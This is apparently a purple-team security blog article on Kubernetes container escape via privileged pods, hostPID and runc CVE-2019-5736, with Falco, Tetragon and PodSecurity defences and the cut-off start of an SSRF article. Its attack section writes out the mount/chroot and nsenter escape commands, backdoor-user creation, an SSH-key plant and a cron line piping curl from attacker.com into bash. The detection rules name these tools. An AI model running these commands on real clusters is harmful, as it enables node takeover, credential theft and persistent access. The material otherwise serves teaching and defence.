SolarWinds showed that attackers can own your build system and reach your customers’ production networks through a single trusted update. Once they have a foothold in a cloud account — whether via a compromised build artifact or any other initial access vector — the next move is lateral: cross-account IAM role chaining to escalate from a single compromised resource to your entire cloud organization. EP10 covers what that lateral movement looks like, how to detect trust relationship abuse in CloudTrail, and how to structure cross-account access so that a single compromise cannot pivot to every account you own.

Get EP10 in your inbox when it publishes → subscribe at linuxcent.com

Kubernetes Container Escape: Attack Paths and eBPF Detection

June 26, 2026 by Vamshi Krishna Santhapuri

Reading Time: 17 minutes

TL;DR

Kubernetes container escape is OWASP A04 + A05: a container deployed with --privileged, hostPID, or hostNetwork is not meaningfully isolated from the host — two commands can produce a root shell on the node
The kernel does not enforce Kubernetes namespace semantics. Container isolation comes from Linux namespaces, cgroups, and seccomp. --privileged removes those boundaries — the kernel sees no difference between the container and the host
Three primary escape paths: privileged container with host device access, hostPID + nsenter, and runc CVEs (CVE-2019-5736) that allow a malicious container to overwrite the runc binary during exec
Detection requires kernel-level visibility: Falco fires on privilege container exec; Tetragon traces nsenter and mount syscalls at the point of the kernel hook, not a process name check that can be evaded
The structural fix is PodSecurity admission enforcing the Restricted profile at the namespace level — policy that blocks --privileged, hostPID, hostNetwork, and mounts before a pod ever schedules
Network policy as a secondary layer: even if a container escapes to the node, a network policy that blocks the escaped process from reaching the Kubernetes API server limits lateral movement to the cluster control plane

OWASP Mapping: A04 Insecure Design — --privileged placed in production workloads because the development environment never enforced boundaries. A05 Security Misconfiguration — absence of PodSecurity admission, RuntimeClass, and seccomp profiles.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│              KUBERNETES CONTAINER ESCAPE — ATTACK SURFACE               │
│                                                                         │
│  ┌──────────────────────────────────────────────────────────────┐       │
│  │                     KUBERNETES NODE                          │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (--privileged)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  web app ──▶ exploit ──▶ shell in container          │   │       │
│  │  │                           │                           │   │       │
│  │  │  PATH 1: mount /dev/sda1  │                           │   │       │
│  │  │  ──────────────────────── ▼                           │   │       │
│  │  │  chroot /mnt/host → root shell on node                │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (hostPID=true)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 2: nsenter -t 1 -m -u -i -n -p -- bash         │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           root shell in host PID 1 namespaces         │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (runc CVE)                                 │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 3: overwrite /proc/self/exe during runc exec    │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           arbitrary code execution as root on node    │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  Node root → kubectl access → cluster-admin via node creds  │       │
│  └──────────────────────────────────────────────────────────────┘       │
│                                                                         │
│  DETECTION LAYER        │  STRUCTURAL FIX                               │
│  Falco / Tetragon       │  PodSecurity Restricted                       │
│  mount syscall hooks    │  RuntimeClass (gVisor/Kata)                   │
│  audit logs             │  Seccomp + no-new-privileges                  │
└─────────────────────────────────────────────────────────────────────────┘

Kubernetes container escape is the point where a compromised application pod becomes a compromised Kubernetes node — and from a node, an attacker reaches the kubelet credential, the node’s service account, and often a path to cluster-admin. The boundary between container and host is not the Kubernetes API. It is Linux namespaces, cgroups, and seccomp. When you remove those with --privileged, you remove the boundary.

The Incident: –privileged “Just for Debugging”

A networking issue in staging. The developer can’t get the CNI tracing they need from inside the normal container. Someone adds --privileged: true to the pod spec to expose /sys/class/net and the raw packet socket. The PR merges. The staging deployment works. The --privileged flag stays in the manifest when staging gets promoted to production.

Six months later, the web application running in that pod has an RCE vulnerability. The attacker gets a shell.

Inside the container, two commands:

mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash

Root on the node. Not escalation through a kernel exploit. Not a zero-day. Just mounting the device that was always accessible because --privileged was set.

The node has a kubelet credential and a service account token with broader permissions than the compromised application ever needed. From the node, lateral movement into the cluster control plane is a matter of using credentials that are already there.

This is A04 (Insecure Design) and A05 (Security Misconfiguration) combined: the design didn’t account for what happens when the boundary is removed, and no enforcement mechanism prevented the configuration from reaching production.

Why the Kernel Doesn’t Know About Kubernetes

Kubernetes namespaces are a scheduler and API concept. When you create a Kubernetes namespace and apply RBAC to it, you are controlling what the Kubernetes API server will accept — you are not creating a kernel isolation boundary between workloads in different namespaces.

Kernel isolation comes from:

Linux namespaces (PID, net, mount, IPC, UTS, user)
  ├── Created by container runtime (containerd, crio)
  ├── Container processes run inside these namespaces
  └── From inside: host PIDs, host network, host filesystem are not visible

cgroups
  ├── Limit CPU, memory, and device access per container
  └── Prevent runaway resource consumption and limit device access scope

seccomp profiles
  ├── Filter system calls the container is allowed to invoke
  └── Block ptrace, mount, CAP_SYS_ADMIN and other privileged syscalls

Capabilities
  ├── Fine-grained kernel privileges (CAP_NET_ADMIN, CAP_SYS_ADMIN, etc.)
  └── --privileged grants ALL capabilities + disables seccomp + disables AppArmor

--privileged removes all three layers simultaneously. It grants every capability, disables the default seccomp filter, and disables AppArmor confinement. A privileged container is effectively a process running on the host with a different filesystem view — and with mount, you can fix even the filesystem view.

Red Phase: The Three Escape Paths

Path 1: –privileged Container

A privileged container has CAP_SYS_ADMIN, which includes the ability to mount arbitrary block devices. On a node with a standard Linux filesystem, /dev/sda1 or equivalent contains the host root filesystem.

Check if the current container is privileged:

# CapEff shows the effective capability set as a hex bitmask
cat /proc/1/status | grep CapEff
# CapEff: 0000003fffffffff

# Decode it
capsh --decode=0000003fffffffff | grep -o 'cap_sys_admin'
# cap_sys_admin — present means privileged

Full escape sequence:

# Step 1: Identify the host block device
# /proc/mounts shows what the container runtime mounted
cat /proc/mounts | grep ' / '
# overlay on / type overlay (rw,...,upperdir=/var/lib/containerd/...)

# Or: check fdisk/lsblk — visible in privileged container
lsblk
# NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
# sda      8:0    0   80G  0 disk
# ├─sda1   8:1    0   79G  0 part /
# └─sda2   8:2    0    1G  0 part [SWAP]

# Step 2: Mount host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

# Step 3a: Write attacker SSH key to host authorized_keys
echo "ssh-rsa AAAA..." >> /mnt/host/root/.ssh/authorized_keys

# Step 3b: Or take an immediate root shell via chroot
chroot /mnt/host /bin/bash
# Now running as root in the host filesystem
# id: uid=0(root) gid=0(root)

# Step 4: From host root — access kubelet credentials
cat /etc/kubernetes/pki/ca.crt
# Or pull the node's bootstrap token / client cert for API server access
ls /var/lib/kubelet/pki/

What persistence looks like from node root:

# Add a backdoor user to host /etc/passwd
chroot /mnt/host useradd -m -s /bin/bash -G sudo backdoor
chroot /mnt/host passwd backdoor

# Or: schedule a cron job on the host
echo "* * * * * root curl http://attacker.com/c2 | bash" \
  >> /mnt/host/etc/cron.d/maintenance

Path 2: hostPID / hostNetwork Escape

hostPID: true is a less obvious escape path than --privileged but equally dangerous. When a container shares the host PID namespace, it can see and interact with every process running on the node — including PID 1, which is running in the host’s full namespace set.

With hostPID enabled, nsenter produces a host root shell without mounting anything:

# From inside the container — see all host processes
ps aux
# This will show containerd, kubelet, systemd, sshd — everything on the node

# nsenter: enter the namespaces of PID 1 (host init process)
# -t 1: target PID 1
# -m: enter mount namespace (host filesystem)
# -u: enter UTS namespace (host hostname)
# -i: enter IPC namespace
# -n: enter network namespace
# -p: enter PID namespace
nsenter -t 1 -m -u -i -n -p -- bash

# Now running in host namespaces
hostname   # shows node hostname, not container hostname
mount | grep " / "  # shows host root mount, not container overlay
id         # uid=0(root) gid=0(root)

nsenter — a Linux utility that enters the namespaces of an existing process. With -t 1 it enters PID 1’s namespaces, which are the host’s namespaces. The result is a shell that sees the host filesystem, host network, and host process tree as if running directly on the node.

hostNetwork: true on its own does not directly produce a root shell, but it exposes the node’s network interfaces and allows binding to host ports. Combined with access to the cloud provider’s instance metadata service (IMDS), it enables credential theft from the node’s IAM role — the attack path covered in SSRF to cloud metadata and IMDSv1 exploitation.

Path 3: runc CVE Escape (CVE-2019-5736)

CVE-2019-5736 is a different attack class — it does not require a misconfiguration in the pod spec. It exploits a race condition in the runc container runtime itself.

The mechanism:

1. Attacker controls a container image
2. Image's entrypoint is a symlink: /proc/self/exe → /runc (or similar path)
3. Operator runs: kubectl exec -it <pod> -- /bin/bash
4. runc reads /proc/self/exe to find its own binary path during exec
5. Attacker's process in container has a brief window to overwrite /proc/self/exe
6. Race condition: attacker overwrites the runc binary on the host with malicious binary
7. On next runc exec, malicious binary runs as root on the host

The detection signature for runc-class escapes is writes to /proc/self/exe or writes to paths that correspond to runc’s host binary location from within a container process:

# Simplified bpftrace detection of /proc/self/exe writes (safe to run as read):
# This shows the pattern — Tetragon implements this as a continuous policy

bpftrace -e '
tracepoint:syscalls:sys_enter_write {
  // Track write() calls where the fd points to /proc/self/exe
  // In production: Tetragon handles this at the LSM hook level
  printf("PID %d comm %s writing fd %d\n", pid, comm, args->fd);
}
' 2>/dev/null | head -20

Patched versions of runc (1.0.0-rc7+, containerd 1.2.3+) fix the race condition. The practical implication: node patching is the only fix for runc-class CVEs — pod security policy cannot prevent a vulnerability in the container runtime itself.

Safe Simulation: Audit Your Cluster Before an Attacker Does

These commands are read-only and safe to run against any cluster you have kubectl access to:

# Find all pods running with --privileged
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name, 
     (.spec.containers[] | select(.securityContext.privileged == true) | .name)] |
    join(" / ")' | \
  sort -u

# Find pods with hostPID or hostNetwork
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.hostPID == true or .spec.hostNetwork == true) |
    [.metadata.namespace, .metadata.name,
     (if .spec.hostPID then "hostPID" else "" end),
     (if .spec.hostNetwork then "hostNetwork" else "" end)] |
    join(" / ")' | \
  grep -v "/$" | \
  sort -u

# Check for pods using hostPath mounts (host filesystem access via volume)
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.volumes[]?.hostPath != null) |
    [.metadata.namespace, .metadata.name,
     (.spec.volumes[] | select(.hostPath != null) |
      .name + "→" + .hostPath.path)] |
    join(" / ")' | \
  sort -u

# Check DaemonSets — these often run privileged and cover every node
kubectl get daemonsets -A -o json | \
  jq -r '.items[] |
    select(.spec.template.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name] | join("/")' | \
  sort -u

Blue Phase: eBPF Detection

Detecting container escape attempts requires visibility below the Kubernetes API layer. Audit logs show pod creation — they do not show what a process inside the container does with mount, nsenter, or /proc/self/exe. eBPF-based tools (Falco, Tetragon) attach to kernel hooks and observe syscalls regardless of what namespace or container they originate from.

Falco: Privileged Container and Mount Detection

# Falco rules for container escape detection
# /etc/falco/rules.d/container-escape.yaml

# Rule 1: Privileged container started
- rule: Privileged Container Started
  desc: >
    A container running with --privileged was started.
    This removes all capability and seccomp restrictions.
  condition: >
    container.privileged = true and
    evt.type = execve and
    container.id != host
  output: >
    Privileged container started
    (user=%user.name user_uid=%user.uid
     command=%proc.cmdline
     container_id=%container.id
     container_name=%container.name
     image=%container.image.repository:%container.image.tag
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, privilege-escalation, OWASP-A05]

# Rule 2: Mount syscall from inside a container
- rule: Container Mount Syscall
  desc: >
    A process inside a container invoked mount().
    In a non-privileged container this fails; in a privileged container
    it succeeds and may be mounting host block devices.
  condition: >
    evt.type = mount and
    container.id != host and
    not proc.name in (container_runtime_processes)
  output: >
    Mount syscall from container
    (user=%user.name
     command=%proc.cmdline
     mount_source=%evt.arg.source
     mount_target=%evt.arg.target
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, OWASP-A04]

# Rule 3: nsenter or chroot invoked inside container
- rule: Namespace Enter or Chroot in Container
  desc: >
    nsenter or chroot executed from within a running container.
    nsenter with -t 1 enters host namespaces directly.
  condition: >
    evt.type = execve and
    container.id != host and
    proc.name in (nsenter, chroot)
  output: >
    nsenter/chroot executed in container
    (user=%user.name
     command=%proc.cmdline
     parent=%proc.pname
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, T1611]

# Rule 4: Process reading host PID tree (hostPID indicator)
- rule: Container Reading Host Process List
  desc: >
    A process inside a container is reading /proc entries for PIDs
    that don't belong to it — indicates hostPID=true and enumeration.
  condition: >
    evt.type = openat and
    fd.name startswith /proc/ and
    fd.name endswith /status and
    container.id != host and
    not fd.name startswith /proc/self
  output: >
    Container reading host process status
    (proc=%proc.cmdline fd=%fd.name
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, discovery, T1057]

Tetragon: TracingPolicy for nsenter and Mount Syscalls

Tetragon attaches eBPF programs at LSM (Linux Security Module) hooks and kernel function entry/exit points. Unlike Falco which uses a single tracepoint aggregation model, Tetragon can enforce at the kernel level — it can block a syscall before it completes, not just alert after the fact.

# Tetragon TracingPolicy: detect and optionally block container escape attempts
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: container-escape-detection
  namespace: kube-system
spec:
  kprobes:
    # Hook 1: sys_mount — detect any mount() call from a container process
    - call: "sys_mount"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # source device (e.g. /dev/sda1)
        - index: 1
          type: "string"     # target mount point
        - index: 2
          type: "string"     # filesystem type
      selectors:
        # Only fire for container processes (not the container runtime itself)
        - matchNamespaces:
          - namespace: Pid
            operator: NotIn
            values:
              - "host_pid_ns"   # Replace with actual host PID NS value
          matchActions:
          - action: Post        # Post = log; change to Sigkill to enforce

    # Hook 2: __x64_sys_execve for nsenter binary
    - call: "__x64_sys_execve"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # filename being executed
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/nsenter"
          matchActions:
          - action: Post

  # Hook 3: write to /proc/self/exe — runc CVE class indicator
  kprobes:
    - call: "vfs_write"
      return: false
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/proc/self/exe"
          matchActions:
          - action: Sigkill   # Block immediately — no legitimate use case for this write

bpftrace: Quick Node-Level Validation

Before deploying Tetragon, you can validate that mount syscalls are observable from the host using bpftrace directly on a node:

# Run on the Kubernetes node (requires root or CAP_BPF)
# Safe observation mode — shows mount attempts from any process including containers

bpftrace -e '
tracepoint:syscalls:sys_enter_mount {
  printf("%-8d %-20s %-30s -> %-30s type=%s\n",
    pid, comm,
    str(args->dev_name),   // source device
    str(args->dir_name),   // mount target
    str(args->type));      // filesystem type
}
' 2>/dev/null
# Sample output:
# PID      COMM                 SOURCE                         TARGET                         TYPE
# 38471    bash                 /dev/sda1                      /mnt/host                      ext4
# 38471 and comm=bash from inside a container = escape attempt in progress

# Watch for nsenter executions across all processes on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
  if (str(args->filename) == "/usr/bin/nsenter" ||
      str(args->filename) == "/bin/nsenter") {
    printf("nsenter called: pid=%d ppid=%d comm=%s\n",
      pid, curtask->real_parent->pid, comm);
  }
}
' 2>/dev/null

What Kubernetes Audit Logs Show (and What They Miss)

Kubernetes audit logs record API server activity. They show pod creation with --privileged set — but only if you are watching pod spec creation events. They do not show anything that happens inside the container after it starts.

# Enable audit policy to capture pod creation with privileged spec
# /etc/kubernetes/audit-policy.yaml (excerpt)

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log pod creation at RequestResponse level (captures full spec)
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods"]
    verbs: ["create", "update", "patch"]

  # Log exec into pods — this is the entry point for escape attempts
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods/exec"]
    verbs: ["create"]

# Parse audit log for privileged pod creation
grep '"privileged":true' /var/log/kubernetes/audit.log | \
  jq -r '[
    .requestReceivedTimestamp,
    .user.username,
    .objectRef.namespace + "/" + .objectRef.name,
    "privileged=true"
  ] | join(" | ")'

# Or via kubectl (if audit log backend is configured)
kubectl get events -A --field-selector reason=Created \
  -o json | \
  jq -r '.items[] |
    select(.message | contains("privileged")) |
    [.metadata.namespace, .involvedObject.name, .message] |
    join(" / ")'

The audit log gap is important to understand: audit logs are a first-alert layer for misconfigured pod creation, not a detection layer for in-progress escape. By the time you see a pod/exec event in audit logs, the attacker already has a shell. eBPF-based detection at the syscall level is what catches the escape itself.

Purple Phase: Structural Fixes

Fix 1: PodSecurity Admission — Enforce Restricted Profile

PodSecurity admission (built into Kubernetes 1.25+, replacing PodSecurityPolicy) enforces security profiles at the namespace level. The Restricted profile blocks --privileged, hostPID, hostNetwork, hostPath volumes, and requires dropping all capabilities.

# Enforce the Restricted PodSecurity profile on a namespace
# This blocks any pod that doesn't meet the criteria from scheduling
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    # enforce: pod is rejected at admission if spec violates Restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    # audit: violations are logged but not rejected (useful for rollout)
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/audit-version: latest
    # warn: user gets a warning but pod is allowed (for migration)
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest

What Restricted profile blocks (relevant to escape paths):

# These settings are REQUIRED by Restricted — apply them explicitly
# to avoid the admission webhook rejecting your workloads

securityContext:
  # Pod-level
  runAsNonRoot: true
  seccompProfile:
    type: RuntimeDefault    # or Localhost with a custom profile

containers:
  - securityContext:
      allowPrivilegeEscalation: false
      privileged: false          # blocks Path 1
      capabilities:
        drop: ["ALL"]            # no CAP_SYS_ADMIN, no CAP_NET_ADMIN
        add: []                  # add only what is specifically required
      readOnlyRootFilesystem: true  # reduces attacker persistence options

# Pod spec — blocked by Restricted
spec:
  hostPID: false           # must be false (blocks Path 2)
  hostNetwork: false       # must be false
  hostIPC: false           # must be false
  volumes:                 # hostPath volumes blocked
    - name: app-data
      emptyDir: {}         # emptyDir, configMap, secret allowed; hostPath not

Rollout approach for existing clusters:

Start with warn mode on all namespaces, identify violations, remediate, then promote to enforce:

# Label all non-system namespaces with warn mode first
kubectl get namespaces -o json | \
  jq -r '.items[] |
    select(.metadata.name | test("^(kube-system|kube-public|kube-node-lease)$") | not) |
    .metadata.name' | \
  while read ns; do
    kubectl label namespace "$ns" \
      pod-security.kubernetes.io/warn=restricted \
      pod-security.kubernetes.io/warn-version=latest \
      --overwrite
    echo "Labeled $ns"
  done

# After a deployment cycle, check for warnings in admission logs
# Look for pods that would be rejected under enforce mode
kubectl get events -A --field-selector reason=FailedCreate \
  -o json | jq -r '.items[] | select(.message | contains("violates PodSecurity"))'

Fix 2: RuntimeClass — Hardware-Level Isolation for Untrusted Workloads

For workloads that cannot run under Restricted profile (CNI plugins, monitoring agents, specific DaemonSets), the alternative is a stronger isolation boundary: a hypervisor-level runtime.

gVisor and Kata Containers intercept system calls at a layer between the container and the Linux kernel, so a container escape exploiting a kernel vulnerability or a privileged mount hits the sandbox boundary, not the host kernel.

# Define a RuntimeClass for gVisor (runsc)
# Requires gVisor installed on nodes with the runsc runtime handler
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc   # must match the handler name in containerd/crio config
scheduling:
  nodeSelector:
    runtime.gvisor: "true"   # only schedule on nodes that have gVisor
---
# Use the RuntimeClass in a pod spec
apiVersion: v1
kind: Pod
metadata:
  name: untrusted-workload
spec:
  runtimeClassName: gvisor   # all syscalls go through gVisor's sentry
  containers:
    - name: app
      image: untrusted-image:latest

# Kata Containers: hardware VM boundary, not just a user-space syscall interceptor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: kata-containers
handler: kata-qemu

For operators: gVisor and Kata Containers have compatibility trade-offs. Not all syscalls are supported in gVisor (it implements a subset of the Linux ABI). Kata Containers have higher startup latency (VM boot time). Benchmark your specific workload before enforcing these on production-critical pods.

Fix 3: Seccomp Profile — Block the Syscalls That Enable Escape

Even without gVisor, a custom seccomp profile that explicitly denies mount, unshare, and clone with namespace flags closes the primary escape syscall surface.

{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"],
  "syscalls": [
    {
      "names": [
        "accept", "accept4", "access", "arch_prctl",
        "bind", "brk", "capget", "capset",
        "chdir", "chmod", "chown", "clock_gettime",
        "clone",
        "close", "connect",
        "dup", "dup2", "dup3",
        "execve", "exit", "exit_group",
        "fchmod", "fchown", "fcntl",
        "fstat", "fstatfs", "fsync",
        "futex", "getcwd", "getdents64",
        "getegid", "geteuid", "getgid", "getgroups",
        "getpeername", "getpid", "getppid",
        "getrlimit", "getsockname", "getsockopt",
        "gettid", "gettimeofday", "getuid",
        "inotify_add_watch", "inotify_init1",
        "listen", "lseek", "lstat",
        "madvise", "mmap", "mprotect",
        "munmap", "nanosleep",
        "open", "openat",
        "pipe", "pipe2", "poll", "ppoll",
        "prctl", "pread64", "pwrite64",
        "read", "readlink", "readv",
        "recvfrom", "recvmsg", "recvmmsg",
        "rename", "rt_sigaction", "rt_sigprocmask",
        "rt_sigreturn", "sched_getaffinity",
        "select", "sendfile", "sendmsg", "sendto",
        "set_robust_list", "set_tid_address",
        "setgid", "setgroups", "setuid",
        "setsockopt", "shutdown",
        "socket", "socketpair",
        "stat", "statfs", "symlink",
        "tgkill", "time", "timerfd_create",
        "timerfd_settime", "truncate",
        "uname", "unlink", "unlinkat",
        "wait4", "waitid",
        "write", "writev"
      ],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}

Apply via pod spec:

spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: "container-escape-block.json"
      # Profile must be in /var/lib/kubelet/seccomp/ on each node

# Distribute the seccomp profile to all nodes via DaemonSet
# Example using a DaemonSet that copies the profile file on startup
# (or use the built-in RuntimeDefault which blocks ~300 dangerous syscalls)

# RuntimeDefault blocks: mount, unshare, clone with new-ns flags,
# add_key, keyctl, request_key, pivot_root — adequate for most workloads
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault

Fix 4: Network Policy — Contain the Blast Radius After Escape

Even if a container escapes to the node, a network policy that prevents the escaped process from reaching the Kubernetes API server limits what the attacker can do with node credentials.

# Deny all egress from application namespace to Kubernetes API server
# The API server typically runs on port 6443 on the control plane nodes
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-api-server-egress
  namespace: production
spec:
  podSelector: {}       # applies to all pods in namespace
  policyTypes:
    - Egress
  egress:
    # Allow DNS
    - ports:
        - protocol: UDP
          port: 53
    # Allow application traffic (customize per workload)
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: production
    # Explicitly: no rule allowing egress to control plane CIDR
    # This is a deny-by-absence — egress to control plane falls through to default deny

# Also block pod-to-pod communication across namespaces
# to prevent an escaped pod from pivoting to other workloads
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
  # No ingress or egress rules = deny all
  # Add specific rules above this as needed

Fix 5: Node Isolation — Co-location Risk

An internet-facing pod and a pod with access to sensitive internal services should not share a node. If the internet-facing pod escapes, it reaches the node’s credentials and can pivot to anything else scheduled on that node.

# Use node selectors, taints, and tolerations to separate workload tiers

# Taint sensitive nodes so only specific workloads schedule there
kubectl taint nodes sensitive-node-1 workload-tier=sensitive:NoSchedule

# Internet-facing pods: dedicated public-tier nodes
# Internal/privileged pods: dedicated sensitive-tier nodes

# Pod spec for internet-facing workload — only schedules on public nodes
spec:
  nodeSelector:
    workload-tier: public
  tolerations: []   # No toleration for sensitive node taint

# Pod spec for sensitive workload — only schedules on sensitive nodes
spec:
  nodeSelector:
    workload-tier: sensitive
  tolerations:
    - key: workload-tier
      operator: Equal
      value: sensitive
      effect: NoSchedule

⚠ Production Gotchas

Legitimate workloads that require –privileged or hostPID. CNI plugins (Cilium, Calico, Flannel node agents), node-local-dns, monitoring agents (node exporters, eBPF-based agents like Tetragon itself), and storage drivers often need elevated access. Blanket enforcement of Restricted profile without exceptions breaks these workloads. The approach: enforce Restricted on application namespaces; use a dedicated namespace for infrastructure DaemonSets with the Baseline or Privileged policy and compensate with Falco detection and node isolation.

Seccomp Restricted blocks some monitoring agents. The default Restricted seccomp profile blocks several syscalls that APM agents and profiling tools use. Run strace -c -f ./your-agent to capture the syscall profile of your monitoring agent before enforcing Restricted. Common culprits: perf_event_open (used by profilers), ptrace (used by some debuggers), bpf (used by eBPF-based tools). Add these to an allowlist seccomp profile rather than running the agent without any profile.

runc CVEs require node patching, not policy. PodSecurity admission and Falco rules protect against configuration-based escapes. A vulnerability in runc, containerd, or the Linux kernel itself bypasses policy-based controls entirely. Keep container runtime versions current; enable automatic node OS patching (Bottlerocket, Flatcar Linux) if your infrastructure allows it. Subscribe to CVE feeds for containerd (containerd/containerd) and runc (opencontainers/runc) specifically.

hostPath volumes are a partial equivalent to –privileged. A pod without --privileged but with a hostPath volume mounting /etc or /var/lib/kubelet can read node credentials without needing to mount a block device. PodSecurity Restricted blocks hostPath entirely; Baseline allows it. Audit for hostPath volumes separately from --privileged.

RuntimeClass with gVisor has syscall compatibility gaps. Applications that use io_uring, certain socket options, or kernel modules will not work under gVisor’s sentry. Test in staging before deploying to production. The gVisor compatibility matrix is documented at gvisor.dev/docs/user_guide/compatibility — check it for any application that does direct filesystem I/O at high volume (databases, high-throughput queues) as the overhead may be unacceptable even if the syscalls are supported.

Quick Reference

Escape Path	Precondition	Detection Signal	Structural Fix
Privileged container → mount	`privileged: true`	Falco: mount syscall from container; Tetragon: sys_mount kprobe	PodSecurity Restricted enforce; seccomp blocks mount
hostPID + nsenter	`hostPID: true`	Falco: nsenter exec in container; audit log: pod creation with hostPID	PodSecurity Restricted; blocks hostPID
hostNetwork + IMDS	`hostNetwork: true`	CloudTrail: IMDSv1 call from unexpected source	Enforce IMDSv2 hop limit 1; PodSecurity Restricted
runc CVE (CVE-2019-5736)	Unpatched runc	Tetragon: vfs_write to /proc/self/exe	Patch runc/containerd; use RuntimeClass (gVisor)
hostPath volume mount	hostPath to sensitive path	Falco: sensitive host file access; PodSecurity audit	PodSecurity Restricted (blocks hostPath)
Escaped → API server	Node credential access	Audit log: API calls from node IP at unexpected time	Network policy blocking node→API server egress

Key Takeaways

Kubernetes container escape starts at the kernel: --privileged, hostPID, and hostNetwork remove Linux namespace and cgroup isolation — the Kubernetes API cannot prevent what happens inside a process that runs with those flags
Two commands from privileged container to root on the node: mount /dev/sda1 /mnt/host and chroot /mnt/host /bin/bash — this is not a sophisticated exploit, it is a default kernel behavior
eBPF detection (Falco, Tetragon) operates at the syscall level and catches the escape in progress; Kubernetes audit logs only catch the misconfigured pod creation, not the exploitation
PodSecurity Restricted enforcement at the namespace level is the structural fix for configuration-based escapes — it blocks --privileged, hostPID, hostNetwork, and hostPath volumes before a pod schedules
runc-class CVEs are independent of configuration — node-level patching and RuntimeClass (gVisor/Kata) isolation are the controls, not policy enforcement
Network policy as a secondary layer limits post-escape lateral movement: a container that escapes to the node should not be able to reach the API server with stolen node credentials

What’s Next

Container escape requires access to a running pod. But what if the attacker didn’t need to exploit anything at runtime — they shipped the attack as a dependency your build pipeline trusted? EP09 covers supply chain attacks from SolarWinds to XZ Utils: how a malicious package or a compromised build step becomes arbitrary code execution before the container ever runs, the detection patterns that are specific to supply chain compromise (dependency confusion, typosquatting, malicious maintainer takeovers), and the SLSA framework controls that create a verifiable chain of custody from source to deployed artifact.

Get EP09 in your inbox when it publishes → subscribe at linuxcent.com

SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach

June 22, 2026 by Vamshi Krishna Santhapuri

Reading Time: 15 minutes

What Is Purple Team? → OWASP Top 10 Cloud → Breach Landscape 2020–2025 → Broken Access Control → MFA Fatigue → CI/CD Secrets → SSRF to Cloud Metadata

TL;DR

SSRF cloud metadata attack is OWASP A10: an attacker exploits a server-side request forgery vulnerability to reach 169.254.169.254 — the EC2 Instance Metadata Service — and retrieve IAM role credentials without authentication
IMDSv1 (the default before 2019) requires no authentication token; any HTTP request from the instance to the IMDS endpoint returns credentials — SSRF anywhere in the stack is sufficient
Capital One (2019): a misconfigured WAF running on EC2 had an SSRF vulnerability → attacker hit the IMDS endpoint → retrieved IAM role credentials → enumerated and exfiltrated over 100 million customer records from S3; $190M settlement
IMDSv2 requires a PUT request to obtain a session token first — a CSRF/SSRF-blocked flow — making the IMDS resistant to standard SSRF exploitation; --http-tokens required is the one-line enforcement
Hop limit of 1 is the container-layer defense: it prevents any process inside a container from reaching IMDS because the TTL expires before the packet traverses the additional network layer
The structural fix is eliminating the credential entirely: OIDC workload identity eliminates static credentials replaces the attached IAM role with a dynamically issued, scoped token — no IMDS credential to steal

OWASP Mapping: A10 — Server-Side Request Forgery (SSRF). The attacker causes the server to make a request to an unintended destination — in this case, the link-local metadata endpoint that returns cloud IAM credentials.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│                    SSRF → IMDS → CREDENTIAL CHAIN                       │
│                                                                         │
